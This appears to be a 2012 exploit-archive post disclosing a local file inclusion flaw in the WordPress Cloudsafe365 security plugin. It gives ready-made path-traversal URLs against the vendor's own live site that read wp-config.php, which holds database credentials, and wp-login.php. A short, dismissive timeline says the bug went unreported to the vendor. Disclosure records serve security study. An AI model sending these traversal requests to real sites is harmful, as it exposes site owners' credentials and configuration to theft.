Home / exploits WordPress Cloudsafe365 Local File Inclusion
Posted on 29 August 2012
This wordpress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this. Demo: http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php Disclosure timeline: * Today: visit wordpress.org * Try to report bug * System wants login * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name * Stuff it, I'm not going to phone them